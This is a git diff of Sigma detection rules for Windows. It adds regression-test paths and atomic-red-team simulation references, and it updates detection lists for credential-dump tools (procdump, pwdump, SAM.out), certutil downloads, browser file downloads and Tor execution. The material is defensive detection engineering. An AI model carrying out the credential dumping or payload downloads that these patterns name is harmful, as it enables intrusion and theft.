Administrator or backup activity - An unknown bug seems to trigger the Windows "svchost" process to drop EVTX files in the "C:\Windows\Temp" directory in the form "_.evtx". See https://superuser.com/questions/1371229/low-disk-space-after-filling-up-c-windows-temp-with-evtx-and-txt-files level: medium +regression_tests_path: regression_data/windows/file/file_event/file_event_win_create_evtx_non_common_locations/info.yml diff --git a/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml b/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml index a4c058951..cc937adea 100644 --- a/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml +++ b/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml @@ -39,3 +39,4 @@ detection: falsepositives: - Unknown level: medium +regression_tests_path: regression_data/windows/file/file_event/file_event_win_create_non_existent_dlls/info.yml diff --git a/rules/windows/file/file_event/file_event_win_creation_new_shim_database.yml b/rules/windows/file/file_event/file_event_win_creation_new_shim_database.yml index 850807c43..15e6595ef 100644 --- a/rules/windows/file/file_event/file_event_win_creation_new_shim_database.yml +++ b/rules/windows/file/file_event/file_event_win_creation_new_shim_database.yml @@ -28,3 +28,4 @@ detection: falsepositives: - Legitimate custom SHIM installations will also trigger this rule level: medium +regression_tests_path: regression_data/windows/file/file_event/file_event_win_creation_new_shim_database/info.yml diff --git a/rules/windows/file/file_event/file_event_win_creation_system_dll_files.yml b/rules/windows/file/file_event/file_event_win_creation_system_dll_files.yml index 709ce4341..dcde35a29 100644 --- a/rules/windows/file/file_event/file_event_win_creation_system_dll_files.yml +++ b/rules/windows/file/file_event/file_event_win_creation_system_dll_files.yml @@ -36,3 +36,4 @@ falsepositives: - Third party software might bundle specific versions of system DLLs. # Note: Upgrade to high after an initial baseline to your environement. level: medium +regression_tests_path: regression_data/windows/file/file_event/file_event_win_creation_system_dll_files/info.yml diff --git a/rules/windows/file/file_event/file_event_win_creation_system_file.yml b/rules/windows/file/file_event/file_event_win_creation_system_file.yml index de270f6ed..f2491a751 100644 --- a/rules/windows/file/file_event/file_event_win_creation_system_file.yml +++ b/rules/windows/file/file_event/file_event_win_creation_system_file.yml @@ -135,3 +135,4 @@ falsepositives: - Third party software naming their software with the same names as the processes mentioned here # Note: Upgrade to high after an initial baseline to your environement. level: medium +regression_tests_path: regression_data/windows/file/file_event/file_event_win_creation_system_file/info.yml diff --git a/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml b/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml index 8be4b7133..ba80d2b3b 100755 --- a/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml +++ b/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml @@ -6,7 +6,7 @@ references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment author: Teymur Kheirkhabarov, oscd.community date: 2019-11-01 -modified: 2022-09-21 +modified: 2025-10-25 tags: - attack.credential-access - attack.t1003.001 @@ -36,7 +36,9 @@ detection: - '\lsremora.dll' - '\lsremora64.dll' - '\NTDS.out' + - '\procdump.exe' - '\procdump64.exe' + - '\procdump64a.exe' - '\pstgdump.exe' - '\pwdump.exe' - '\SAM.out' @@ -50,3 +52,4 @@ detection: falsepositives: - Legitimate Administrator using tool for password recovery level: high +regression_tests_path: regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/info.yml diff --git a/rules/windows/file/file_event/file_event_win_dump_file_susp_creation.yml b/rules/windows/file/file_event/file_event_win_dump_file_susp_creation.yml index c445dd4e7..4cf6a2769 100644 --- a/rules/windows/file/file_event/file_event_win_dump_file_susp_creation.yml +++ b/rules/windows/file/file_event/file_event_win_dump_file_susp_creation.yml @@ -31,3 +31,4 @@ detection: falsepositives: - Some administrative PowerShell or VB scripts might have the ability to collect dumps and move them to other folders which might trigger a false positive. level: medium +regression_tests_path: regression_data/windows/file/file_event/file_event_win_dump_file_susp_creation/info.yml diff --git a/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml b/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml index 7762eb876..17ac9eefa 100644 --- a/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml +++ b/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml @@ -55,3 +55,4 @@ detection: falsepositives: - Some tuning is required for other general purpose directories of third party apps level: medium +regression_tests_path: regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/info.yml diff --git a/rules/windows/file/file_event/file_event_win_susp_public_folder_extension.yml b/rules/windows/file/file_event/file_event_win_susp_public_folder_extension.yml index 826214e9b..a88121ed0 100644 --- a/rules/windows/file/file_event/file_event_win_susp_public_folder_extension.yml +++ b/rules/windows/file/file_event/file_event_win_susp_public_folder_extension.yml @@ -30,3 +30,4 @@ detection: falsepositives: - Administrators deploying legitimate binaries to public folders. level: high +regression_tests_path: regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/info.yml diff --git a/rules/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec.yml b/rules/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec.yml index 0a7680262..df8f87366 100644 --- a/rules/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec.yml +++ b/rules/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec.yml @@ -31,3 +31,4 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/file/file_event/file_event_win_susp_recycle_bin_fake_exec/info.yml diff --git a/rules/windows/file/file_event/file_event_win_taskmgr_lsass_dump.yml b/rules/windows/file/file_event/file_event_win_taskmgr_lsass_dump.yml index 968797ea8..063cbb8e3 100644 --- a/rules/windows/file/file_event/file_event_win_taskmgr_lsass_dump.yml +++ b/rules/windows/file/file_event/file_event_win_taskmgr_lsass_dump.yml @@ -25,3 +25,4 @@ detection: falsepositives: - Rare case of troubleshooting by an administrator or support that has to be investigated regardless level: high +regression_tests_path: regression_data/windows/file/file_event/file_event_win_taskmgr_lsass_dump/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_at_interactive_execution.yml b/rules/windows/process_creation/proc_creation_win_at_interactive_execution.yml index c0386597b..7604bede6 100644 --- a/rules/windows/process_creation/proc_creation_win_at_interactive_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_at_interactive_execution.yml @@ -24,3 +24,8 @@ detection: falsepositives: - Unlikely (at.exe deprecated as of Windows 8) level: high +simulation: + - type: atomic-red-team + name: At.exe Scheduled task + technique: T1053.002 + atomic_guid: 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 diff --git a/rules/windows/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml b/rules/windows/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml index 30361b857..b11ec8ab6 100644 --- a/rules/windows/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml +++ b/rules/windows/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml @@ -31,3 +31,8 @@ detection: falsepositives: - Unlikely level: high +simulation: + - type: atomic-red-team + name: Windows - Disable Windows Recovery Console Repair + technique: T1490 + atomic_guid: cf21060a-80b3-4238-a595-22525de4ab81 diff --git a/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml b/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml index fe39b2885..4b132caf8 100644 --- a/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml +++ b/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml @@ -57,3 +57,4 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_browsers_chromium_load_extension.yml b/rules/windows/process_creation/proc_creation_win_browsers_chromium_load_extension.yml index bdc8f54c0..63894ef0e 100644 --- a/rules/windows/process_creation/proc_creation_win_browsers_chromium_load_extension.yml +++ b/rules/windows/process_creation/proc_creation_win_browsers_chromium_load_extension.yml @@ -31,3 +31,4 @@ detection: falsepositives: - Usage of Chrome Extensions in testing tools such as BurpSuite will trigger this alert level: medium +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml b/rules/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml index 9502bfcf2..4691d9645 100644 --- a/rules/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml +++ b/rules/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml @@ -29,3 +29,4 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml b/rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml index 05707be7d..079a5ff36 100644 --- a/rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml +++ b/rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml @@ -40,3 +40,4 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_browsers_inline_file_download.yml b/rules/windows/process_creation/proc_creation_win_browsers_inline_file_download.yml index b93a5b353..7f371c32c 100644 --- a/rules/windows/process_creation/proc_creation_win_browsers_inline_file_download.yml +++ b/rules/windows/process_creation/proc_creation_win_browsers_inline_file_download.yml @@ -7,7 +7,7 @@ references: - https://lolbas-project.github.io/lolbas/Binaries/Msedge/ author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) date: 2022-01-11 -modified: 2023-11-09 +modified: 2025-10-27 tags: - attack.command-and-control - attack.t1105 @@ -25,19 +25,31 @@ detection: selection_http: CommandLine|contains: 'http' selection_extensions: - CommandLine|endswith: - - '.7z' - - '.dat' - - '.dll' - - '.exe' - - '.hta' - - '.ps1' - - '.psm1' - - '.txt' - - '.vbe' - - '.vbs' - - '.zip' + - CommandLine|endswith: + - '.7z' + - '.dat' + - '.dll' + - '.exe' + - '.hta' + - '.ps1' + - '.psm1' + - '.txt' + - '.vbe' + - '.vbs' + - '.zip' + - CommandLine|contains: + - '.7z"' + - '.dat"' + - '.dll"' + - '.hta"' + - '.ps1"' + - '.psm1"' + - '.txt"' + - '.vbe"' + - '.vbs"' + - '.zip"' condition: all of selection_* falsepositives: - Unknown level: medium +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_browsers_inline_file_download/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_browsers_tor_execution.yml b/rules/windows/process_creation/proc_creation_win_browsers_tor_execution.yml index 2584b566d..c82b3202e 100644 --- a/rules/windows/process_creation/proc_creation_win_browsers_tor_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_browsers_tor_execution.yml @@ -6,7 +6,7 @@ references: - https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/ author: frack113 date: 2022-02-20 -modified: 2023-02-13 +modified: 2025-10-27 tags: - attack.command-and-control - attack.t1090.003 @@ -15,10 +15,13 @@ logsource: product: windows detection: selection: - Image|endswith: - - '\tor.exe' - - '\Tor Browser\Browser\firefox.exe' + - Description: 'Tor Browser' + - Product: 'Tor Browser' + - Image|endswith: + - '\tor.exe' + - '\Tor Browser\Browser\firefox.exe' condition: selection falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_browsers_tor_execution/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_certutil_certificate_installation.yml b/rules/windows/process_creation/proc_creation_win_certutil_certificate_installation.yml index d97c7467f..0cf25ec27 100644 --- a/rules/windows/process_creation/proc_creation_win_certutil_certificate_installation.yml +++ b/rules/windows/process_creation/proc_creation_win_certutil_certificate_installation.yml @@ -33,3 +33,4 @@ detection: falsepositives: - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP level: medium +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_certutil_certificate_installation/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_certutil_decode.yml b/rules/windows/process_creation/proc_creation_win_certutil_decode.yml index 94a55c2ac..f5adf9a1e 100644 --- a/rules/windows/process_creation/proc_creation_win_certutil_decode.yml +++ b/rules/windows/process_creation/proc_creation_win_certutil_decode.yml @@ -30,3 +30,4 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_certutil_decode/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_certutil_download.yml b/rules/windows/process_creation/proc_creation_win_certutil_download.yml index d9e77b38c..383396186 100644 --- a/rules/windows/process_creation/proc_creation_win_certutil_download.yml +++ b/rules/windows/process_creation/proc_creation_win_certutil_download.yml @@ -33,3 +33,4 @@ detection: falsepositives: - Unknown level: medium +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_certutil_download/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip.yml b/rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip.yml index 53f947fee..534127ee0 100644 --- a/rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip.yml +++ b/rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip.yml @@ -70,3 +70,4 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_certutil_download_direct_ip/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml b/rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml index 2ba1233f6..71c582b4f 100644 --- a/rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml +++ b/rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml @@ -67,3 +67,4 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_certutil_encode.yml b/rules/windows/process_creation/proc_creation_win_certutil_encode.yml index 2994f73f4..7d39336b9 100644 --- a/rules/windows/process_creation/proc_creation_win_certutil_encode.yml +++ b/rules/windows/process_creation/proc_creation_win_certutil_encode.yml @@ -25,3 +25,4 @@ detection: falsepositives: - As this is a general purpose rule, legitimate usage of the encode functionality will trigger some false positives. Apply additional filters accordingly level: medium +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_certutil_encode/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml b/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml index 0f50997da..346e89674 100644 --- a/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml +++ b/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml @@ -44,3 +44,4 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location.yml b/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location.yml index b4a8cf6cf..40088482e 100644 --- a/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location.yml +++ b/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location.yml @@ -39,3 +39,4 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_certutil_export_pfx.yml b/rules/windows/process_creation/proc_creation_win_certutil_export_pfx.yml index 37df08c33..523c0c39f 100644 --- a/rules/windows/process_creation/proc_creation_win_certutil_export_pfx.yml +++ b/rules/windows/process_creation/proc_creation_win_certutil_export_pfx.yml @@ -23,3 +23,4 @@ detection: falsepositives: - There legitimate reasons to export certificates. Investigate the activity to determine if it's benign level: medium +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml b/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml index 0797a090d..68bd35a2b 100644 --- a/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml +++ b/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml @@ -25,3 +25,4 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup.yml b/rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup.yml index ea4a95808..d9fc9e19a 100644 --- a/rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup.yml +++ b/rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup.yml @@ -31,3 +31,4 @@ falsepositives: - During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command. - Discord was seen using chcp to look up code pages level: medium +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_chcp_codepage_lookup/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_chcp_codepage_switch.yml b/rules/windows/process_creation/proc_creation_win_chcp_codepage_switch.yml index 60284bb2b..8eed64669 100644 --- a/rules/windows/process_creation/proc_creation_win_chcp_codepage_switch.yml +++ b/rules/windows/process_creation/proc_creation_win_chcp_codepage_switch.yml @@ -28,3 +28,4 @@ detection: falsepositives: - Administrative activity (adjust code pages according to your organization's region) level: medium +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_chcp_codepage_switch/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml b/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml index fbcb5aa63..1dcc1fb5b 100644 --- a/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml +++ b/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml @@ -26,3 +26,9 @@ detection: falsepositives: - Unknown level: medium +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data/info.yml +simulation: + - type: atomic-red-team + name: Overwrite deleted data on C drive + technique: T1485 + atomic_guid: 321fd25e-0007-417f-adec-33232252be19 diff --git a/rules/windows/process_creation/proc_creation_win_clip_execution.yml b/rules/windows/process_creation/proc_creation_win_clip_execution.yml index cbfa3cbae..d418147a7 100644 --- a/rules/windows/process_creation/proc_creation_win_clip_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_clip_execution.yml @@ -22,3 +22,9 @@ detection: falsepositives: - Unknown level: low +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_clip_execution/info.yml +simulation: + - type: atomic-red-team + name: Utilize Clipboard to store or execute commands from + technique: T1115 + atomic_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7 diff --git a/rules/windows/process_creation/proc_creation_win_cmd_assoc_execution.yml b/rules/windows/process_creation/proc_creation_win_cmd_assoc_execution.yml index b514753cf..abd99334f 100644 --- a/rules/windows/process_creation/proc_creation_win_cmd_assoc_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_cmd_assoc_execution.yml @@ -29,3 +29,4 @@ detection: falsepositives: - Admin activity level: low +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_cmd_assoc_execution/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_cmd_dir_execution.yml b/rules/windows/process_creation/proc_creation_win_cmd_dir_execution.yml index 2f05817d3..2f56765a2 100644 --- a/rules/windows/process_creation/proc_creation_win_cmd_dir_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_cmd_dir_execution.yml @@ -24,3 +24,9 @@ detection: falsepositives: - Likely level: low +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_cmd_dir_execution/info.yml +simulation: + - type: atomic-red-team + name: List Internet Explorer Bookmarks using the command prompt + technique: T1217 + atomic_guid: 727dbcdb-e495-4ab1-a6c4-80c7f77aef85 diff --git a/rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml b/rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml index 41a6959c2..99cc9eff1 100644 --- a/rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml +++ b/rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml @@ -28,3 +28,4 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_cmd_rmdir_execution.yml b/rules/windows/process_creation/proc_creation_win_cmd_rmdir_execution.yml index 6f297d0bb..2daf4e788 100644 --- a/rules/windows/process_creation/proc_creation_win_cmd_rmdir_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_cmd_rmdir_execution.yml @@ -32,3 +32,4 @@ detection: falsepositives: - Unknown level: low +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_cmd_rmdir_execution/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml b/rules/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml index 8dee296e2..1e2d1ac7a 100644 --- a/rules/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml +++ b/rules/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml @@ -29,3 +29,9 @@ detection: falsepositives: - Legitimate usage for administration purposes level: medium +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds/info.yml +simulation: + - type: atomic-red-team + name: RDP to DomainController + technique: T1021.001 + atomic_guid: 355d4632-8cb9-449d-91ce-b566d0253d3e diff --git a/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml b/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml index 81e569894..9d976fddc 100644 --- a/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml +++ b/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml @@ -25,3 +25,9 @@ detection: falsepositives: - Legitimate administrative tasks level: high +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_cmdkey_recon/info.yml +simulation: + - type: atomic-red-team + name: Cached Credential Dump via Cmdkey + technique: T1003.005 + atomic_guid: 56506854-89d6-46a3-9804-b7fde90791f9 diff --git a/rules/windows/process_creation/proc_creation_win_conhost_headless_powershell.yml b/rules/windows/process_creation/proc_creation_win_conhost_headless_powershell.yml index 733c4e2f5..fca6d3fca 100644 --- a/rules/windows/process_creation/proc_creation_win_conhost_headless_powershell.yml +++ b/rules/windows/process_creation/proc_creation_win_conhost_headless_powershell.yml @@ -32,3 +32,4 @@ detection: falsepositives: - Unknown level: medium +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_conhost_headless_powershell/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_curl_susp_download.yml b/rules/windows/process_creation/proc_creation_win_curl_susp_download.yml index 13ff16ec5..268902efb 100644 --- a/rules/windows/process_creation/proc_creation_win_curl_susp_download.yml +++ b/rules/windows/process_creation/proc_creation_win_curl_susp_download.yml @@ -64,3 +64,9 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_curl_susp_download/info.yml +simulation: + - type: atomic-red-team + name: Curl Download File + technique: T1105 + atomic_guid: 2b080b99-0deb-4d51-af0f-833d37c4ca6a diff --git a/rules/windows/process_creation/proc_creation_win_dirlister_execution.yml b/rules/windows/process_creation/proc_creation_win_dirlister_execution.yml index 047fd42fd..fb1cf36f1 100644 --- a/rules/windows/process_creation/proc_creation_win_dirlister_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_dirlister_execution.yml @@ -17,8 +17,14 @@ logsource: detection: selection: - OriginalFileName: 'DirLister.exe' - - Image|endswith: '\dirlister.exe' + - Image|endswith: '\DirLister.exe' condition: selection falsepositives: - Legitimate use by users level: low +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_dirlister_execution/info.yml +simulation: + - type: atomic-red-team + name: Launch DirLister Executable + technique: T1083 + atomic_guid: c5bec457-43c9-4a18-9a24-fe151d8971b7 diff --git a/rules/windows/process_creation/proc_creation_win_discovery_via_reg_queries.yml b/rules/windows/process_creation/proc_creation_win_discovery_via_reg_queries.yml index 6d54b2bf6..6eeb4a48a 100644 --- a/rules/windows/process_creation/proc_creation_win_discovery_via_reg_queries.yml +++ b/rules/windows/process_creation/proc_creation_win_discovery_via_reg_queries.yml @@ -8,6 +8,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/75fa21076dcefa348a7521403cdd6bfc4e88623c/atomics/T1124/T1124.md author: lazarg date: 2025-06-12 +modified: 2025-10-25 tags: - attack.discovery - attack.t1082 @@ -28,14 +29,26 @@ detection: - 'gpv' selection_keys: CommandLine|contains: - - '\SYSTEM\CurrentControlSet\Control\TimeZoneInformation' # Contains time zone details - - '\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces' # Holds network configuration details + - '\SOFTWARE\Microsoft\Windows Defender' # Details about defender state - '\SOFTWARE\Microsoft\Windows NT\CurrentVersion' # Provides details about the OS - '\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall' # Lists installed programs - - '\SOFTWARE\Microsoft\Windows Defender' # Details about defender state + - '\SYSTEM\CurrentControlSet\Control\TimeZoneInformation' # Contains time zone details - '\SYSTEM\CurrentControlSet\Services' # Details about existing services - - '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks' # Details about existing scheduled tasks condition: 1 of selection_cmd_* and selection_keys falsepositives: - Unlikely level: low +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_discovery_via_reg_queries/info.yml +simulation: + - type: atomic-red-team + name: System Information Discovery + technique: T1010 + atomic_guid: 66703791-c902-4560-8770-42b8a91f7667 + - type: atomic-red-team + name: Discover OS Product Name via Registry + technique: T1082 + atomic_guid: be3b5fe3-a575-4fb8-83f6-ad4a68dd5ce7 + - type: atomic-red-team + name: Discover OS Build Number via Registry + technique: T1082 + atomic_guid: acfcd709-0013-4f1e-b9ee-bc1e7bafaaec diff --git a/rules/windows/process_creation/proc_creation_win_dism_remove.yml b/rules/windows/process_creation/proc_creation_win_dism_remove.yml index 97cdc01e7..c54dcc8a8 100644 --- a/rules/windows/process_creation/proc_creation_win_dism_remove.yml +++ b/rules/windows/process_creation/proc_creation_win_dism_remove.yml @@ -37,3 +37,9 @@ detection: falsepositives: - Legitimate script level: medium +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_dism_remove/info.yml +simulation: + - type: atomic-red-team + name: Disable Windows Defender with DISM + technique: T1562.001 + atomic_guid: 871438ac-7d6e-432a-b27d-3e7db69faf58 diff --git a/rules/windows/process_creation/proc_creation_win_driverquery_recon.yml b/rules/windows/process_creation/proc_creation_win_driverquery_recon.yml index 81f65698a..11b619fde 100644 --- a/rules/windows/process_creation/proc_creation_win_driverquery_recon.yml +++ b/rules/windows/process_creation/proc_creation_win_driverquery_recon.yml @@ -36,3 +36,4 @@ detection: falsepositives: - Legitimate usage by some scripts might trigger this as well level: high +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_driverquery_recon/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_driverquery_usage.yml b/rules/windows/process_creation/proc_creation_win_driverquery_usage.yml index 67b75a3c7..641f13000 100644 --- a/rules/windows/process_creation/proc_creation_win_driverquery_usage.yml +++ b/rules/windows/process_creation/proc_creation_win_driverquery_usage.yml @@ -36,3 +36,4 @@ detection: falsepositives: - Legitimate use by third party tools in order to investigate installed drivers level: medium # Level could be reduced to low if this utility is often used in your environment +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_driverquery_usage/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml b/rules/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml index 14f203af0..698be9ee9 100644 --- a/rules/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml +++ b/rules/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml @@ -29,3 +29,9 @@ detection: falsepositives: - Legitimate use of the utilities by legitimate user for legitimate reason level: medium +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery/info.yml +simulation: + - type: atomic-red-team + name: Windows - Discover domain trusts with dsquery + technique: T1482 + atomic_guid: 4700a710-c821-4e17-a3ec-9e4c81d6845f diff --git a/rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump.yml b/rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump.yml index 2af1bcea5..b130982ab 100644 --- a/rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump.yml +++ b/rules/windows/process_creation/proc_creation_win_dtrace_kernel_dump.yml @@ -25,3 +25,4 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_dtrace_kernel_dump/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary.yml b/rules/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary.yml index 3a6d4ad67..340498e87 100644 --- a/rules/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary.yml +++ b/rules/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary.yml @@ -26,3 +26,4 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/process_creation/proc_creation_win_explorer_folder_shortcut_via_shell_binary/info.yml diff --git a/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords.yml b/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords.yml index 160781174..2e0593d10 100644 --- 